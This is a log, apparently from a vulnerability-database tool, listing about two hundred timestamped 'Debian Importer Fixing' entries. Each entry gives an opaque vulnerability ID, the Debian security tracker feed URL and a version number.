2026-04-11T18:15:13.689028+00:00 Debian Importer Fixing VCID-4yhn-j5se-kfhv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:15:13.644991+00:00 Debian Importer Fixing VCID-3g7r-1s51-akht https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:14:57.744816+00:00 Debian Importer Fixing VCID-p5aw-n691-nkff https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:14:57.047890+00:00 Debian Importer Fixing VCID-cqpp-1e1t-x7aa https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:14:55.314768+00:00 Debian Importer Fixing VCID-p3p3-suuz-dycr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:14:47.723693+00:00 Debian Importer Fixing VCID-sr4g-yz6w-ebfk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:14:33.662310+00:00 Debian Importer Fixing VCID-es5w-6nr6-73cn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:14:27.157887+00:00 Debian Importer Fixing VCID-9cmk-p7za-wqds https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:14:26.168330+00:00 Debian Importer Fixing VCID-sat2-d6u2-f3c9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:14:19.279012+00:00 Debian Importer Fixing VCID-kdw5-8y5z-zya5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:14:09.285565+00:00 Debian Importer Fixing VCID-65cc-fm97-5uad https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:14:08.431295+00:00 Debian Importer Fixing VCID-2tv8-3fz3-3yfy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:13:58.703748+00:00 Debian Importer Fixing VCID-cvqm-2557-e7ba https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:13:45.631634+00:00 Debian Importer Fixing VCID-ebyn-hv86-8kdz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:13:39.471172+00:00 Debian Importer Fixing VCID-zrtt-8nnj-v3ch https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:13:12.296492+00:00 Debian Importer Fixing VCID-tc3z-912z-afc8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:12:52.173181+00:00 Debian Importer Fixing VCID-x95w-ad3j-n7aj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:12:38.855020+00:00 Debian Importer Fixing VCID-zrke-eysb-37e1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:12:37.887343+00:00 Debian Importer Fixing VCID-v2r8-1wgn-1bgs https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:12:37.628164+00:00 Debian Importer Fixing VCID-pmpn-drv8-9ude https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:12:18.150301+00:00 Debian Importer Fixing VCID-7fw6-fzyj-7qf3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:12:13.051529+00:00 Debian Importer Fixing VCID-p31j-f9s2-quh9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:11:50.552387+00:00 Debian Importer Fixing VCID-hnhy-ksua-juam https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:11:45.105559+00:00 Debian Importer Fixing VCID-h78w-2n4r-8qfh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:11:42.176687+00:00 Debian Importer Fixing VCID-wjeh-7bpm-zyga https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:11:36.290950+00:00 Debian Importer Fixing VCID-yah4-bf7d-w7f4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:11:33.820309+00:00 Debian Importer Fixing VCID-46gw-xunr-jqbp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:11:25.916377+00:00 Debian Importer Fixing VCID-vaks-d4k5-zue7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:11:11.846029+00:00 Debian Importer Fixing VCID-tvzz-994x-xbcc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:11:09.024579+00:00 Debian Importer Fixing VCID-w8d2-r2ct-m7gv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:11:07.327794+00:00 Debian Importer Fixing VCID-utsb-dc1p-jkcq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:11:03.077178+00:00 Debian Importer Fixing VCID-envn-rnvj-4yd2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:11:03.033272+00:00 Debian Importer Fixing VCID-jhk3-xpvd-xbfj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:10:55.828478+00:00 Debian Importer Fixing VCID-cznc-ubr4-zkcu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:10:54.935301+00:00 Debian Importer Fixing VCID-ne72-mzag-2keg https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:10:51.037114+00:00 Debian Importer Fixing VCID-djqz-f6k5-fqfj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:10:38.042374+00:00 Debian Importer Fixing VCID-c9cz-ebdv-t7eq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:10:34.866660+00:00 Debian Importer Fixing VCID-kxus-63yw-sufe https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:10:27.098623+00:00 Debian Importer Fixing VCID-vdum-127b-qfbq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:10:25.141238+00:00 Debian Importer Fixing VCID-u9gb-ppd4-3fd5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:10:02.750460+00:00 Debian Importer Fixing VCID-85ny-1w5w-57aq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:09:40.096433+00:00 Debian Importer Fixing VCID-tspc-ndj7-37h5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:09:31.747106+00:00 Debian Importer Fixing VCID-4dpv-a4ns-hye2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:09:30.815913+00:00 Debian Importer Fixing VCID-hwcd-dj3f-guay https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:09:20.480840+00:00 Debian Importer Fixing VCID-6kep-3ygd-hkbn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:09:01.975927+00:00 Debian Importer Fixing VCID-4s1v-yhef-uqfx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:08:56.572659+00:00 Debian Importer Fixing VCID-vbgc-23c4-77hu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:08:46.132171+00:00 Debian Importer Fixing VCID-7pyx-kb1k-wufg https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:08:27.275207+00:00 Debian Importer Fixing VCID-uwj5-1fkf-7qg9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:08:23.193509+00:00 Debian Importer Fixing VCID-h8cp-df76-c3dz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:08:11.255191+00:00 Debian Importer Fixing VCID-t4gn-rwz1-ykcf https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:07:54.107164+00:00 Debian Importer Fixing VCID-1e38-tmxy-9kew https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:07:34.738868+00:00 Debian Importer Fixing VCID-g1ct-6d28-g3ab https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:07:29.546698+00:00 Debian Importer Fixing VCID-3ubj-wp5c-ruat https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:07:21.541270+00:00 Debian Importer Fixing VCID-ay8n-59tt-k7cp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:07:09.273060+00:00 Debian Importer Fixing VCID-eeah-xwrp-f3b5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:07:08.771647+00:00 Debian Importer Fixing VCID-g9xf-han8-6qgs https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:07:04.734546+00:00 Debian Importer Fixing VCID-sy2v-5ufy-sfc4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:06:51.534454+00:00 Debian Importer Fixing VCID-trt9-1y65-53en https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:06:50.756616+00:00 Debian Importer Fixing VCID-bge6-p7sc-dqdu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:06:50.496181+00:00 Debian Importer Fixing VCID-t2pe-etah-1bh3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:06:40.646321+00:00 Debian Importer Fixing VCID-my2x-tnvf-wqbw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:06:35.763342+00:00 Debian Importer Fixing VCID-zpcy-nms7-kuha https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:06:20.639891+00:00 Debian Importer Fixing VCID-xd3u-trsv-fbd3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:06:02.928780+00:00 Debian Importer Fixing VCID-8v7y-kcz2-bbb9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:55.353458+00:00 Debian Importer Fixing VCID-vyfj-c9vq-wkc9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:52.435182+00:00 Debian Importer Fixing VCID-4p71-qkjb-97c6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:50.621167+00:00 Debian Importer Fixing VCID-3136-6rpy-vbep https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:45.611167+00:00 Debian Importer Fixing VCID-fnck-7mvx-hqc9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:43.216760+00:00 Debian Importer Fixing VCID-dabd-m3mf-3ker https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:40.609975+00:00 Debian Importer Fixing VCID-3vc6-9vhj-ckb2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:36.211952+00:00 Debian Importer Fixing VCID-t9u8-a55c-xqhr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:31.863351+00:00 Debian Importer Fixing VCID-3ju6-ah7s-suhh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:23.951212+00:00 Debian Importer Fixing VCID-7ynu-qf57-ykba https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:23.758031+00:00 Debian Importer Fixing VCID-1v6v-gk53-8ye7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:22.618769+00:00 Debian Importer Fixing VCID-ypyd-2tg4-xqb1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:14.024509+00:00 Debian Importer Fixing VCID-xtfv-8vvu-qudb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:13.319353+00:00 Debian Importer Fixing VCID-8gvq-1vk8-17bx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:05:05.593451+00:00 Debian Importer Fixing VCID-cbqr-aybx-d3e6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:04:44.018881+00:00 Debian Importer Fixing VCID-7yur-twpa-n3e1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:04:43.866536+00:00 Debian Importer Fixing VCID-krca-sq7c-gfbg https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:04:41.870059+00:00 Debian Importer Fixing VCID-p2zf-ypkv-g7ay https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:04:21.340613+00:00 Debian Importer Fixing VCID-u9um-rar7-97e8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:04:20.757387+00:00 Debian Importer Fixing VCID-b7dh-gjtk-qfhn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:04:20.026485+00:00 Debian Importer Fixing VCID-kuyn-8jwc-qyb9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:04:16.692802+00:00 Debian Importer Fixing VCID-68kj-s42g-effd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:04:10.923719+00:00 Debian Importer Fixing VCID-r889-wzc7-1yem https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:04:07.026289+00:00 Debian Importer Fixing VCID-dzxx-5pbd-fqc4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:04:04.568732+00:00 Debian Importer Fixing VCID-aqs4-r36j-ffe7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:04:01.833369+00:00 Debian Importer Fixing VCID-d8yf-8rff-3yhf https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:03:43.590613+00:00 Debian Importer Fixing VCID-emmr-15qp-vfah https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:03:01.612485+00:00 Debian Importer Fixing VCID-4qbq-95vy-k7bv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:02:47.354191+00:00 Debian Importer Fixing VCID-wd77-5tpf-6yhy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:02:41.575413+00:00 Debian Importer Fixing VCID-shzj-77rr-n3g4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:02:41.526559+00:00 Debian Importer Fixing VCID-3pky-3t1q-v3av https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:02:37.907584+00:00 Debian Importer Fixing VCID-t38m-c4zf-yqe6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:02:35.248912+00:00 Debian Importer Fixing VCID-xsue-s6sg-aqff https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:02:24.978127+00:00 Debian Importer Fixing VCID-z7e5-pt2s-x3a5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:02:22.890219+00:00 Debian Importer Fixing VCID-f6pf-5jnz-fkd1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:02:13.670250+00:00 Debian Importer Fixing VCID-vgvf-at1z-8ydr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:02:07.395800+00:00 Debian Importer Fixing VCID-jxwd-tm1k-yqa2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:57.546008+00:00 Debian Importer Fixing VCID-g49y-ec8g-f7h4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:48.595486+00:00 Debian Importer Fixing VCID-qda9-n7gh-c7c4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:40.639177+00:00 Debian Importer Fixing VCID-cdsg-3312-zka6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:37.062759+00:00 Debian Importer Fixing VCID-jume-bjh7-f3hr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:29.416440+00:00 Debian Importer Fixing VCID-rqdx-1pdv-a3bu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:20.597852+00:00 Debian Importer Fixing VCID-5jx9-7bd4-f3hk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:16.445890+00:00 Debian Importer Fixing VCID-kd82-724m-77h8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:14.002651+00:00 Debian Importer Fixing VCID-ckma-a7b3-k3aw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:09.269859+00:00 Debian Importer Fixing VCID-ghqa-k8ma-tfcs https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:04.373513+00:00 Debian Importer Fixing VCID-6279-tc7g-g3ag https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:03.980860+00:00 Debian Importer Fixing VCID-3bbh-2exn-m7ac https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:01.985199+00:00 Debian Importer Fixing VCID-w44j-ecnr-mkhv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:01:01.199837+00:00 Debian Importer Fixing VCID-7hxc-bmqq-pyf3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:00:56.767499+00:00 Debian Importer Fixing VCID-w1t7-1b22-jqe6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:00:45.758167+00:00 Debian Importer Fixing VCID-rzge-64xp-bfej https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:00:43.764875+00:00 Debian Importer Fixing VCID-n22y-f9az-fubm https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:00:43.081986+00:00 Debian Importer Fixing VCID-zjgp-g783-d3hy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:00:40.169303+00:00 Debian Importer Fixing VCID-884z-9tnu-kfa5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:00:37.835428+00:00 Debian Importer Fixing VCID-zs46-dubn-wfga https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:00:34.586592+00:00 Debian Importer Fixing VCID-smpj-hz7t-8bhq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:00:27.342507+00:00 Debian Importer Fixing VCID-paf4-ycea-buae https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:00:02.687791+00:00 Debian Importer Fixing VCID-je5t-8uuq-ekdk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:59:56.070409+00:00 Debian Importer Fixing VCID-rf1t-45cj-mue1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:59:37.937052+00:00 Debian Importer Fixing VCID-784p-34mz-vucz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:59:30.723958+00:00 Debian Importer Fixing VCID-yspe-wj34-juck https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:59:30.575902+00:00 Debian Importer Fixing VCID-ak8s-9hyp-47fa https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:59:06.403957+00:00 Debian Importer Fixing VCID-fdav-btjk-pkbe https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:58:49.062861+00:00 Debian Importer Fixing VCID-jjzy-ch18-qkfp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:58:46.383488+00:00 Debian Importer Fixing VCID-72e3-s3pn-gbe5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:58:44.560662+00:00 Debian Importer Fixing VCID-zszf-nytw-jqgx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:58:31.988271+00:00 Debian Importer Fixing VCID-gaat-4369-hug5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:58:31.204161+00:00 Debian Importer Fixing VCID-p2v1-1y51-cfg8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:58:25.086203+00:00 Debian Importer Fixing VCID-xgu5-jypk-h3bd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:58:18.479521+00:00 Debian Importer Fixing VCID-karw-d7ee-3yhs https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:58:14.752431+00:00 Debian Importer Fixing VCID-ngzz-mwp9-rkdv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:56.863191+00:00 Debian Importer Fixing VCID-pj8s-qad1-6qdu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:44.619560+00:00 Debian Importer Fixing VCID-yqzg-rzp1-bbgm https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:44.369227+00:00 Debian Importer Fixing VCID-bum5-f5xb-akeg https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:44.326882+00:00 Debian Importer Fixing VCID-9akb-t56u-4yhr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:42.007139+00:00 Debian Importer Fixing VCID-m4we-6udg-p7cj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:35.805176+00:00 Debian Importer Fixing VCID-8zt8-za5g-s7e6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:34.683942+00:00 Debian Importer Fixing VCID-rmg9-7tdv-eyh4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:30.314441+00:00 Debian Importer Fixing VCID-xnkt-e7mn-e7du https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:26.700571+00:00 Debian Importer Fixing VCID-ur14-3rbn-j3ev https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:25.832860+00:00 Debian Importer Fixing VCID-bcy4-phg3-w3fq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:18.477263+00:00 Debian Importer Fixing VCID-25zp-duta-2ffk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:09.226164+00:00 Debian Importer Fixing VCID-kfb4-xnqr-cya6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:09.181144+00:00 Debian Importer Fixing VCID-txgd-58rj-73a3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:57:01.462548+00:00 Debian Importer Fixing VCID-5y72-4n85-qyeb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:56:52.875458+00:00 Debian Importer Fixing VCID-46ey-s7sy-9qby https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:56:52.554874+00:00 Debian Importer Fixing VCID-nsn7-a7z8-1qcd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:56:42.311754+00:00 Debian Importer Fixing VCID-zdu5-rtg2-pffb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:56:25.729405+00:00 Debian Importer Fixing VCID-e3ne-1hd5-dyfg https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:56:23.784170+00:00 Debian Importer Fixing VCID-qjrj-rdqd-uqdy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:56:06.412854+00:00 Debian Importer Fixing VCID-s747-5kgj-pqeh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:55:16.495233+00:00 Debian Importer Fixing VCID-anh4-1hmn-yfh8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:55:13.792630+00:00 Debian Importer Fixing VCID-b6c2-jyre-ykg9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:54:49.981780+00:00 Debian Importer Fixing VCID-8fa4-9jsh-3bh9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:54:46.265069+00:00 Debian Importer Fixing VCID-7wrg-6pw1-nucx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:54:39.819499+00:00 Debian Importer Fixing VCID-y2nm-f9vb-d7ez https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:54:38.787280+00:00 Debian Importer Fixing VCID-ur3j-m1rh-q3dn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:54:23.083000+00:00 Debian Importer Fixing VCID-ehgb-g7qu-97an https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:54:21.503884+00:00 Debian Importer Fixing VCID-2yeg-fvbe-f3bz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:54:15.453723+00:00 Debian Importer Fixing VCID-177y-cbh1-myay https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:54:14.082377+00:00 Debian Importer Fixing VCID-pnpw-8utk-uua7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:53:54.103824+00:00 Debian Importer Fixing VCID-6yn4-p8f4-pbh1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:53:47.046188+00:00 Debian Importer Fixing VCID-b5pd-kk97-gban https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:53:36.305729+00:00 Debian Importer Fixing VCID-rghj-fgdd-nke7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:53:26.633763+00:00 Debian Importer Fixing VCID-ps6p-v38m-6qe3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:53:20.461955+00:00 Debian Importer Fixing VCID-sz6p-kkuh-fkeu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:53:00.872844+00:00 Debian Importer Fixing VCID-jbhc-41ed-guap https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:52:56.009747+00:00 Debian Importer Fixing VCID-vc8u-8je2-kfgt https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:52:38.701134+00:00 Debian Importer Fixing VCID-wpsv-h9q7-pyep https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:52:31.713679+00:00 Debian Importer Fixing VCID-ra5y-ag3h-5yb8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:52:27.777263+00:00 Debian Importer Fixing VCID-8bac-p2pq-vkf1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:52:20.985845+00:00 Debian Importer Fixing VCID-x6sg-6k7v-9qd8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:52:12.592931+00:00 Debian Importer Fixing VCID-mcry-3vgm-kyh1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:52:05.331415+00:00 Debian Importer Fixing VCID-x6ad-gnf9-ebes https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:52:04.885971+00:00 Debian Importer Fixing VCID-5r21-bc2f-9fha https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:51:50.425364+00:00 Debian Importer Fixing VCID-yhmq-s1jh-17bh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:51:40.696343+00:00 Debian Importer Fixing VCID-8862-dh13-hyga https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:51:33.563095+00:00 Debian Importer Fixing VCID-sdwh-3s12-17fr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:51:26.034352+00:00 Debian Importer Fixing VCID-nsfn-bhe3-cbd4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:51:23.308160+00:00 Debian Importer Fixing VCID-ruf5-255v-sfdb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:51:23.180694+00:00 Debian Importer Fixing VCID-pthp-wza7-hkgm https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:51:21.128099+00:00 Debian Importer Fixing VCID-5zkt-kcgx-a3e2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:51:08.565993+00:00 Debian Importer Fixing VCID-yub2-x8z7-d3e6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:51:07.447902+00:00 Debian Importer Fixing VCID-1ppp-hukx-syb3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:51:04.728163+00:00 Debian Importer Fixing VCID-dsee-yrq9-cuca https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:57.952768+00:00 Debian Importer Fixing VCID-a472-7128-s3eh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:55.636749+00:00 Debian Importer Fixing VCID-u23c-4px5-c3g9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:47.293442+00:00 Debian Importer Fixing VCID-fvny-qu61-fbf4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:44.471056+00:00 Debian Importer Fixing VCID-ph82-atva-6kgd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:38.219599+00:00 Debian Importer Fixing VCID-zfw4-5zqw-huh7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:37.952417+00:00 Debian Importer Fixing VCID-tqu8-qq9b-gkev https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:37.308254+00:00 Debian Importer Fixing VCID-fafu-jmw4-dqd9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:33.271114+00:00 Debian Importer Fixing VCID-23ws-9cmr-jffa https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:29.913158+00:00 Debian Importer Fixing VCID-jtkv-nvan-jbag https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:24.682126+00:00 Debian Importer Fixing VCID-g2k2-5sn8-t7dz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:24.481770+00:00 Debian Importer Fixing VCID-x6ab-eb8b-t3e7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:22.422673+00:00 Debian Importer Fixing VCID-ytpg-f9mm-sbev https://security-tracker.debian.org/tracker/data/json 38.3.0
